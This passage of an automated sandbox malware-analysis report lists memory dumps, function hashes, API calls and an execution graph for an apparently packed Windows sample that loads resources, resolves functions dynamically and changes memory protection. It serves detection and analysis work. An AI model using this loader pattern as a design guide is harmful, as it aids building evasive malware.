                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3990497365-0
                                                                                                                                              • Opcode ID: 9d7fc9f71498792909b65b2d7cf24e31ba31f22b7c542ea305a9ee9a5f43ae5f
                                                                                                                                              • Instruction ID: 1e74469ea03d589a08e4d892dae02775db51f9606f604e247a094fb7b248915c
                                                                                                                                              • Opcode Fuzzy Hash: 9d7fc9f71498792909b65b2d7cf24e31ba31f22b7c542ea305a9ee9a5f43ae5f
                                                                                                                                              • Instruction Fuzzy Hash: 61411870A4025C9BDB22EB78CC88BDAB7FDAB18301F2040EDA548E7241DB759E848F51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 847c6cb56ab3ccf762ccdf2cd181f43277fb2c6fa8d5dcd06a81a6e8765e1bcb
                                                                                                                                              • Instruction ID: a5ced1d7b4596b35e84262ec867e3aae95e6fa145e69d3a47b9ee14496e07d73
                                                                                                                                              • Opcode Fuzzy Hash: 847c6cb56ab3ccf762ccdf2cd181f43277fb2c6fa8d5dcd06a81a6e8765e1bcb
                                                                                                                                              • Instruction Fuzzy Hash: F5A1F5A67116000BE719AA7D9C843ADB3C6DBC4326FB8427EE51DCB3C3EB64C9518750
                                                                                                                                              APIs
                                                                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,027C9562), ref: 027C94FA
                                                                                                                                              • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,027C9562), ref: 027C9500
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DateFormatLocaleThread
                                                                                                                                              • String ID: yyyy
                                                                                                                                              • API String ID: 3303714858-3145165042
                                                                                                                                              • Opcode ID: 171a9532637eb922d6314b57400fda91528069c9deb6e8ce2ed19851a4002a39
                                                                                                                                              • Instruction ID: ddd7a69aa16548dd781cc710273c2d14676b0cf876df1432b0f4bc9e8f2eb5b8
                                                                                                                                              • Opcode Fuzzy Hash: 171a9532637eb922d6314b57400fda91528069c9deb6e8ce2ed19851a4002a39
                                                                                                                                              • Instruction Fuzzy Hash: 3A217E76A002289FDB51DBB4D895ABAB3B9EF48710F6100ADEA05E7280D6309F008B65
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                              • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027D8216), ref: 027D81F8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                              • String ID: FlushInstructionCache$Kernel32
                                                                                                                                              • API String ID: 3811539418-184458249
                                                                                                                                              • Opcode ID: a9e39169fd28eeb6a913109a20a8d5bf7a67499c1a00f49ada7e156e5401cda4
                                                                                                                                              • Instruction ID: 87720f675854520081dcb708297f4940cd393edf247cee2954ea223663739208
                                                                                                                                              • Opcode Fuzzy Hash: a9e39169fd28eeb6a913109a20a8d5bf7a67499c1a00f49ada7e156e5401cda4
                                                                                                                                              • Instruction Fuzzy Hash: 78018B79640204AFEB11EEA4DC69B5B37AEE708B00F728428B504D3A40D674AD008B25
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocValue
                                                                                                                                              • String ID: QV
                                                                                                                                              • API String ID: 1189806713-3869509414
                                                                                                                                              • Opcode ID: e73eb86d1415971d9106e5c39a3e5146bc6ad82b47d48266c48e0c800fe5c31c
                                                                                                                                              • Instruction ID: 4e7183bbd803ca9ecad0ebcaa4617b0e59859920c3397a1f45a509a4196ae15b
                                                                                                                                              • Opcode Fuzzy Hash: e73eb86d1415971d9106e5c39a3e5146bc6ad82b47d48266c48e0c800fe5c31c
                                                                                                                                              • Instruction Fuzzy Hash: 45C002B4D503229AEF21BBB5948960A369EEBC4305F20992DB510CF148DB36C615DF64
                                                                                                                                              APIs
                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 027DAD98
                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 027DADC8
                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000008), ref: 027DADE7
                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 027DADF3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Read$Write
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3448952669-0
                                                                                                                                              • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                                                                              • Instruction ID: 4c3dd244805e3bd6c46751bb30de44d677a380fec3f573e279b86c8edb9c4e46
                                                                                                                                              • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                                                                              • Instruction Fuzzy Hash: 5721B4B1A403199BDF11DF6ACC80BAE77B9FF80312F144115EE50A7344EB34D911DAA4

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:5.1%
                                                                                                                                              Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                                              Signature Coverage:4.6%
                                                                                                                                              Total number of Nodes:1251
                                                                                                                                              Total number of Limit Nodes:49
                                                                                                                                              execution_graph 14210 25689308 14211 25689348 CloseHandle 14210->14211 14213 25689379 14211->14213 14214 25680c10 14215 25680c19 14214->14215 14218 25681838 14214->14218 14221 25683bf3 14214->14221 14224 25689080 14218->14224 14223 25689080 VirtualProtect 14221->14223 14222 25683c12 14223->14222 14226 25689093 14224->14226 14228 25689130 14226->14228 14229 25689178 VirtualProtect 14228->14229 14231 25681851 14229->14231 14232 40cbdd 14233 40cbe9 __ioinit 14232->14233 14267 40d534 HeapCreate 14233->14267 14236 40cc46 14269 41087e GetModuleHandleW 14236->14269 14240 40cc57 __RTC_Initialize 14303 411a15 14240->14303 14241 40cbb4 _fast_error_exit 63 API calls 14241->14240 14243 40cc66 14244 40cc72 GetCommandLineA 14243->14244 14443 40e79a 14243->14443 14318 412892 14244->14318 14251 40cc97 14357 41255f 14251->14357 14253 40e79a __amsg_exit 63 API calls 14253->14251 14255 40cca8 14372 40e859 14255->14372 14256 40e79a __amsg_exit 63 API calls 14256->14255 14258 40ccb0 14259 40ccbb 14258->14259 14260 40e79a __amsg_exit 63 API calls 14258->14260 14378 4019f0 OleInitialize 14259->14378 14260->14259 14262 40ccd8 14263 40ccea 14262->14263 14432 40ea0a 14262->14432 14450 40ea36 14263->14450 14266 40ccef __ioinit 14268 40cc3a 14267->14268 14268->14236 14435 40cbb4 14268->14435 14270 410892 14269->14270 14271 410899 14269->14271 14453 40e76a 14270->14453 14273 410a01 14271->14273 14274 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14271->14274 14512 410598 14273->14512 14276 4108ec TlsAlloc 14274->14276 14279 40cc4c 14276->14279 14280 41093a TlsSetValue 14276->14280 14279->14240 14279->14241 14280->14279 14281 41094b 14280->14281 14457 40ea54 14281->14457 14286 41046e __encode_pointer 6 API calls 14287 41096b 14286->14287 14288 41046e __encode_pointer 6 API calls 14287->14288 14289 41097b 14288->14289 14290 41046e __encode_pointer 6 API calls 14289->14290 14291 41098b 14290->14291 14474 40d564 14291->14474 14298 4104e9 __decode_pointer 6 API calls 14299 4109df 14298->14299 14299->14273 14300 4109e6 14299->14300 14494 4105d5 14300->14494 14302 4109ee GetCurrentThreadId 14302->14279 14818 40e1d8 14303->14818 14305 411a21 GetStartupInfoA 14306 411cba __calloc_crt 63 API calls 14305->14306 14308 411a42 14306->14308 14307 411c60 __ioinit 14307->14243 14308->14307 14311 411ba7 14308->14311 14312 411cba __calloc_crt 63 API calls 14308->14312 14317 411b2a 14308->14317 14309 411bdd GetStdHandle 14309->14311 14310 411c42 SetHandleCount 14310->14307 14311->14307 14311->14309 14311->14310 14313 411bef GetFileType 14311->14313 14314 41389c __ioinit InitializeCriticalSectionAndSpinCount 14311->14314 14312->14308 14313->14311 14314->14311 14315 411b53 GetFileType 14315->14317 14316 41389c __ioinit InitializeCriticalSectionAndSpinCount 14316->14317 14317->14307 14317->14311 14317->14315 14317->14316 14319 4128b0 GetEnvironmentStringsW 14318->14319 14326 4128cf 14318->14326 14320 4128b8 14319->14320 14321 4128c4 GetLastError 14319->14321 14322 4128eb GetEnvironmentStringsW 14320->14322 14323 4128fa WideCharToMultiByte 14320->14323 14321->14326 14322->14323 14327 40cc82 14322->14327 14331 41295d FreeEnvironmentStringsW 14323->14331 14332 41292e 14323->14332 14324 412971 GetEnvironmentStrings 14324->14327 14328 412981 14324->14328 14325 412968 14325->14324 14325->14327 14326->14320 14326->14325 14344 4127d7 14327->14344 14333 411c75 __malloc_crt 63 API calls 14328->14333 14331->14327 14334 411c75 __malloc_crt 63 API calls 14332->14334 14335 41299b 14333->14335 14336 412934 14334->14336 14337 4129a2 FreeEnvironmentStringsA 14335->14337 14338 4129ae ___crtGetEnvironmentStringsA 14335->14338 14336->14331 14339 41293c WideCharToMultiByte 14336->14339 14337->14327 14342 4129b8 FreeEnvironmentStringsA 14338->14342 14340 412956 14339->14340 14341 41294e 14339->14341 14340->14331 14343 40b6b5 __crtGetStringTypeA_stat 63 API calls 14341->14343 14342->14327 14343->14340 14345 4127f1 GetModuleFileNameA 14344->14345 14346 4127ec 14344->14346 14348 412818 14345->14348 14825 41446b 14346->14825 14819 41263d 14348->14819 14351 40cc8c 14351->14251 14351->14253 14352 412854 14353 411c75 __malloc_crt 63 API calls 14352->14353 14354 41285a 14353->14354 14354->14351 14355 41263d _parse_cmdline 73 API calls 14354->14355 14356 412874 14355->14356 14356->14351 14358 412568 14357->14358 14360 41256d _strlen 14357->14360 14359 41446b ___initmbctable 107 API calls 14358->14359 14359->14360 14361 411cba __calloc_crt 63 API calls 14360->14361 14364 40cc9d 14360->14364 14367 4125a2 _strlen 14361->14367 14362 412600 14363 40b6b5 __crtGetStringTypeA_stat 63 API calls 14362->14363 14363->14364 14364->14255 14364->14256 14365 411cba __calloc_crt 63 API calls 14365->14367 14366 412626 14369 40b6b5 __crtGetStringTypeA_stat 63 API calls 14366->14369 14367->14362 14367->14364 14367->14365 14367->14366 14368 40ef42 _strcpy_s 63 API calls 14367->14368 14370 4125e7 14367->14370 14368->14367 14369->14364 14370->14367 14371 40e61c __invoke_watson 10 API calls 14370->14371 14371->14370 14373 40e867 __IsNonwritableInCurrentImage 14372->14373 15236 413586 14373->15236 14375 40e885 __initterm_e 14377 40e8a4 __IsNonwritableInCurrentImage __initterm 14375->14377 15240 40d2bd 14375->15240 14377->14258 14379 401ab9 14378->14379 15340 40b99e 14379->15340 14381 401abf 14382 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 14381->14382 14412 402467 14381->14412 14383 401dc3 CloseHandle GetModuleHandleA 14382->14383 14391 401c55 14382->14391 15353 401650 14383->15353 14385 401e8b FindResourceA LoadResource LockResource SizeofResource 14386 40b84d _malloc 63 API calls 14385->14386 14387 401ebf 14386->14387 15355 40af66 14387->15355 14389 401c9c CloseHandle 14389->14262 14390 401ecb _memset 14392 401efc SizeofResource 14390->14392 14391->14389 14395 401cf9 Module32Next 14391->14395 14393 401f1c 14392->14393 14394 401f5f 14392->14394 14393->14394 15393 401560 14393->15393 14396 401f92 _memset 14394->14396 14398 401560 __VEC_memcpy 14394->14398 14395->14383 14406 401d0f 14395->14406 14399 401fa2 FreeResource 14396->14399 14398->14396 14400 40b84d _malloc 63 API calls 14399->14400 14401 401fbb SizeofResource 14400->14401 14402 401fe5 _memset 14401->14402 14403 4020aa LoadLibraryA 14402->14403 14404 401650 14403->14404 14405 40216c GetProcAddress 14404->14405 14408 4021aa 14405->14408 14405->14412 14406->14389 14407 401dad Module32Next 14406->14407 14407->14383 14407->14406 14408->14412 15367 4018f0 14408->15367 14410 40243f 14411 40b6b5 __crtGetStringTypeA_stat 63 API calls 14410->14411 14410->14412 14411->14412 14412->14262 14413 4021f1 14413->14410 15379 401870 14413->15379 14415 402269 VariantInit 14416 401870 76 API calls 14415->14416 14417 40228b VariantInit 14416->14417 14418 4022a7 14417->14418 14419 4022d9 SafeArrayCreate SafeArrayAccessData 14418->14419 15384 40b350 14419->15384 14422 40232c 14423 402354 SafeArrayDestroy 14422->14423 14431 40235b 14422->14431 14423->14431 14424 402392 SafeArrayCreateVector 14425 4023a4 14424->14425 14426 4023bc VariantClear VariantClear 14425->14426 15386 4019a0 14426->15386 14429 40242e 14430 4019a0 66 API calls 14429->14430 14430->14410 14431->14424 15658 40e8de 14432->15658 14434 40ea1b 14434->14263 14436 40cbc2 14435->14436 14437 40cbc7 14435->14437 14438 40ec4d __FF_MSGBANNER 63 API calls 14436->14438 14439 40eaa2 __NMSG_WRITE 63 API calls 14437->14439 14438->14437 14440 40cbcf 14439->14440 14441 40e7ee __mtinitlocknum 4 API calls 14440->14441 14442 40cbd9 14441->14442 14442->14236 14444 40ec4d __FF_MSGBANNER 63 API calls 14443->14444 14445 40e7a4 14444->14445 14446 40eaa2 __NMSG_WRITE 63 API calls 14445->14446 14447 40e7ac 14446->14447 14448 4104e9 __decode_pointer 6 API calls 14447->14448 14449 40cc71 14448->14449 14449->14244 14451 40e8de _doexit 63 API calls 14450->14451 14452 40ea41 14451->14452 14452->14266 14454 40e775 Sleep GetModuleHandleW 14453->14454 14455 40e793 14454->14455 14456 40e797 14454->14456 14455->14454 14455->14456 14456->14271 14518 4104e0 14457->14518 14459 40ea5c __init_pointers __initp_misc_winsig 14521 41393d 14459->14521 14462 41046e __encode_pointer 6 API calls 14463 40ea98 14462->14463 14464 41046e TlsGetValue 14463->14464 14465 4104a7 GetModuleHandleW 14464->14465 14466 410486 14464->14466 14467 4104c2 GetProcAddress 14465->14467 14468 4104b7 14465->14468 14466->14465 14469 410490 TlsGetValue 14466->14469 14473 41049f 14467->14473 14470 40e76a __crt_waiting_on_module_handle 2 API calls 14468->14470 14472 41049b 14469->14472 14471 4104bd 14470->14471 14471->14467 14471->14473 14472->14465 14472->14473 14473->14286 14475 40d56f 14474->14475 14477 40d59d 14475->14477 14524 41389c 14475->14524 14477->14273 14478 4104e9 TlsGetValue 14477->14478 14479 410501 14478->14479 14480 410522 GetModuleHandleW 14478->14480 14479->14480 14483 41050b TlsGetValue 14479->14483 14481 410532 14480->14481 14482 41053d GetProcAddress 14480->14482 14484 40e76a __crt_waiting_on_module_handle 2 API calls 14481->14484 14485 41051a 14482->14485 14487 410516 14483->14487 14486 410538 14484->14486 14485->14273 14488 411cba 14485->14488 14486->14482 14486->14485 14487->14480 14487->14485 14491 411cc3 14488->14491 14490 4109c5 14490->14273 14490->14298 14491->14490 14492 411ce1 Sleep 14491->14492 14529 40e231 14491->14529 14493 411cf6 14492->14493 14493->14490 14493->14491 14797 40e1d8 14494->14797 14496 4105e1 GetModuleHandleW 14497 4105f1 14496->14497 14498 4105f7 14496->14498 14499 40e76a __crt_waiting_on_module_handle 2 API calls 14497->14499 14500 410633 14498->14500 14501 41060f GetProcAddress GetProcAddress 14498->14501 14499->14498 14502 40d6e0 __lock 59 API calls 14500->14502 14501->14500 14503 410652 InterlockedIncrement 14502->14503 14798 4106aa 14503->14798 14506 40d6e0 __lock 59 API calls 14507 410673 14506->14507 14801 4145d2 InterlockedIncrement 14507->14801 14509 410691 14813 4106b3 14509->14813 14511 41069e __ioinit 14511->14302 14513 4105a2 14512->14513 14514 4105ae 14512->14514 14515 4104e9 __decode_pointer 6 API calls 14513->14515 14516 4105d0 14514->14516 14517 4105c2 TlsFree 14514->14517 14515->14514 14516->14516 14517->14516 14519 41046e __encode_pointer 6 API calls 14518->14519 14520 4104e7 14519->14520 14520->14459 14522 41046e __encode_pointer 6 API calls 14521->14522 14523 40ea8e 14522->14523 14523->14462 14528 40e1d8 14524->14528 14526 4138a8 InitializeCriticalSectionAndSpinCount 14527 4138ec __ioinit 14526->14527 14527->14475 14528->14526 14530 40e23d __ioinit 14529->14530 14531 40e255 14530->14531 14541 40e274 _memset 14530->14541 14542 40bfc1 14531->14542 14535 40e2e6 HeapAlloc 14535->14541 14536 40e26a __ioinit 14536->14491 14541->14535 14541->14536 14548 40d6e0 14541->14548 14555 40def2 14541->14555 14561 40e32d 14541->14561 14564 40d2e3 14541->14564 14567 4106bc GetLastError 14542->14567 14544 40bfc6 14545 40e744 14544->14545 14546 4104e9 __decode_pointer 6 API calls 14545->14546 14547 40e754 __invoke_watson 14546->14547 14549 40d6f5 14548->14549 14550 40d708 EnterCriticalSection 14548->14550 14592 40d61d 14549->14592 14550->14541 14552 40d6fb 14552->14550 14553 40e79a __amsg_exit 62 API calls 14552->14553 14554 40d707 14553->14554 14554->14550 14557 40df20 14555->14557 14556 40dfb9 14560 40dfc2 14556->14560 14792 40db09 14556->14792 14557->14556 14557->14560 14785 40da59 14557->14785 14560->14541 14796 40d606 LeaveCriticalSection 14561->14796 14563 40e334 14563->14541 14565 4104e9 __decode_pointer 6 API calls 14564->14565 14566 40d2f3 14565->14566 14566->14541 14581 410564 TlsGetValue 14567->14581 14570 410729 SetLastError 14570->14544 14571 411cba __calloc_crt 60 API calls 14572 4106e7 14571->14572 14572->14570 14573 4104e9 __decode_pointer 6 API calls 14572->14573 14574 410701 14573->14574 14575 410720 14574->14575 14576 410708 14574->14576 14586 40b6b5 14575->14586 14578 4105d5 __initptd 60 API calls 14576->14578 14580 410710 GetCurrentThreadId 14578->14580 14579 410726 14579->14570 14580->14570 14582 410594 14581->14582 14583 410579 14581->14583 14582->14570 14582->14571 14584 4104e9 __decode_pointer 6 API calls 14583->14584 14585 410584 TlsSetValue 14584->14585 14585->14582 14587 40b6c1 __ioinit 14586->14587 14588 40b73d __ioinit 14587->14588 14589 40b714 HeapFree 14587->14589 14588->14579 14589->14588 14590 40b727 14589->14590 14591 40bfc1 __vsnprintf_l 62 API calls 14590->14591 14591->14588 14593 40d629 __ioinit 14592->14593 14594 40d64f 14593->14594 14618 40ec4d 14593->14618 14600 40d65f __ioinit 14594->14600 14664 411c75 14594->14664 14600->14552 14602 40d680 14606 40d6e0 __lock 63 API calls 14602->14606 14603 40d671 14605 40bfc1 __vsnprintf_l 63 API calls 14603->14605 14605->14600 14607 40d687 14606->14607 14608 40d6bb 14607->14608 14609 40d68f 14607->14609 14611 40b6b5 __crtGetStringTypeA_stat 63 API calls 14608->14611 14610 41389c __ioinit InitializeCriticalSectionAndSpinCount 14609->14610 14612 40d69a 14610->14612 14617 40d6ac 14611->14617 14613 40b6b5 __crtGetStringTypeA_stat 63 API calls 14612->14613 14612->14617 14615 40d6a6 14613->14615 14616 40bfc1 __vsnprintf_l 63 API calls 14615->14616 14616->14617 14669 40d6d7 14617->14669 14672 413d5b 14618->14672 14621 40eaa2 __NMSG_WRITE 63 API calls 14623 40ec79 14621->14623 14622 413d5b __set_error_mode 63 API calls 14625 40ec61 14622->14625 14626 40eaa2 __NMSG_WRITE 63 API calls 14623->14626 14624 40d63e 14627 40eaa2 14624->14627 14625->14621 14625->14624 14626->14624 14628 40eab6 14627->14628 14629 413d5b __set_error_mode 60 API calls 14628->14629 14660 40d645 14628->14660 14630 40ead8 14629->14630 14631 40ec16 GetStdHandle 14630->14631 14633 413d5b __set_error_mode 60 API calls 14630->14633 14632 40ec24 _strlen 14631->14632 14631->14660 14636 40ec3d WriteFile 14632->14636 14632->14660 14634 40eae9 14633->14634 14634->14631 14635 40eafb 14634->14635 14635->14660 14678 40ef42 14635->14678 14636->14660 14639 40eb31 GetModuleFileNameA 14641 40eb4f 14639->14641 14646 40eb72 _strlen 14639->14646 14642 40ef42 _strcpy_s 60 API calls 14641->14642 14644 40eb5f 14642->14644 14645 40e61c __invoke_watson 10 API calls 14644->14645 14644->14646 14645->14646 14657 40ebb5 14646->14657 14694 411da6 14646->14694 14650 40ebd9 14653 413ce7 _strcat_s 60 API calls 14650->14653 14652 40e61c __invoke_watson 10 API calls 14652->14650 14654 40ebed 14653->14654 14656 40ebfe 14654->14656 14658 40e61c __invoke_watson 10 API calls 14654->14658 14655 40e61c __invoke_watson 10 API calls 14655->14657 14712 413b7e 14656->14712 14703 413ce7 14657->14703 14658->14656 14661 40e7ee 14660->14661 14750 40e7c3 GetModuleHandleW 14661->14750 14667 411c7e 14664->14667 14666 40d66a 14666->14602 14666->14603 14667->14666 14668 411c95 Sleep 14667->14668 14754 40b84d 14667->14754 14668->14667 14784 40d606 LeaveCriticalSection 14669->14784 14671 40d6de 14671->14600 14675 413d6a 14672->14675 14673 40bfc1 __vsnprintf_l 63 API calls 14676 413d8d 14673->14676 14674 40ec54 14674->14622 14674->14625 14675->14673 14675->14674 14677 40e744 __vsnprintf_l 6 API calls 14676->14677 14677->14674 14679 40ef53 14678->14679 14680 40ef5a 14678->14680 14679->14680 14685 40ef80 14679->14685 14681 40bfc1 __vsnprintf_l 63 API calls 14680->14681 14682 40ef5f 14681->14682 14683 40e744 __vsnprintf_l 6 API calls 14682->14683 14684 40eb1d 14683->14684 14684->14639 14687 40e61c 14684->14687 14685->14684 14686 40bfc1 __vsnprintf_l 63 API calls 14685->14686 14686->14682 14739 40ba30 14687->14739 14689 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14690 40e725 GetCurrentProcess TerminateProcess 14689->14690 14691 40e719 __invoke_watson 14689->14691 14741 40ce09 14690->14741 14691->14690 14693 40e742 14693->14639 14699 411db8 14694->14699 14695 411dbc 14696 40bfc1 __vsnprintf_l 63 API calls 14695->14696 14697 40eba2 14695->14697 14698 411dd8 14696->14698 14697->14655 14697->14657 14700 40e744 __vsnprintf_l 6 API calls 14698->14700 14699->14695 14699->14697 14701 411e02 14699->14701 14700->14697 14701->14697 14702 40bfc1 __vsnprintf_l 63 API calls 14701->14702 14702->14698 14704 413cff 14703->14704 14707 413cf8 14703->14707 14705 40bfc1 __vsnprintf_l 63 API calls 14704->14705 14706 413d04 14705->14706 14708 40e744 __vsnprintf_l 6 API calls 14706->14708 14707->14704 14709 413d33 14707->14709 14710 40ebc8 14708->14710 14709->14710 14711 40bfc1 __vsnprintf_l 63 API calls 14709->14711 14710->14650 14710->14652 14711->14706 14713 4104e0 _doexit 6 API calls 14712->14713 14714 413b8e 14713->14714 14715 413ba1 LoadLibraryA 14714->14715 14720 413c29 14714->14720 14716 413ccb 14715->14716 14717 413bb6 GetProcAddress 14715->14717 14716->14660 14717->14716 14719 413bcc 14717->14719 14718 413c53 14724 4104e9 __decode_pointer 6 API calls 14718->14724 14736 413c7e 14718->14736 14722 41046e __encode_pointer 6 API calls 14719->14722 14720->14718 14721 4104e9 __decode_pointer 6 API calls 14720->14721 14726 413c46 14721->14726 14727 413bd2 GetProcAddress 14722->14727 14723 4104e9 __decode_pointer 6 API calls 14723->14716 14725 413c96 14724->14725 14734 4104e9 __decode_pointer 6 API calls 14725->14734 14725->14736 14728 4104e9 __decode_pointer 6 API calls 14726->14728 14729 41046e __encode_pointer 6 API calls 14727->14729 14728->14718 14730 413be7 GetProcAddress 14729->14730 14731 41046e __encode_pointer 6 API calls 14730->14731 14732 413bfc GetProcAddress 14731->14732 14733 41046e __encode_pointer 6 API calls 14732->14733 14735 413c11 14733->14735 14734->14736 14735->14720 14737 413c1b GetProcAddress 14735->14737 14736->14723 14738 41046e __encode_pointer 6 API calls 14737->14738 14738->14720 14740 40ba3c __VEC_memzero 14739->14740 14740->14689 14742 40ce11 14741->14742 14743 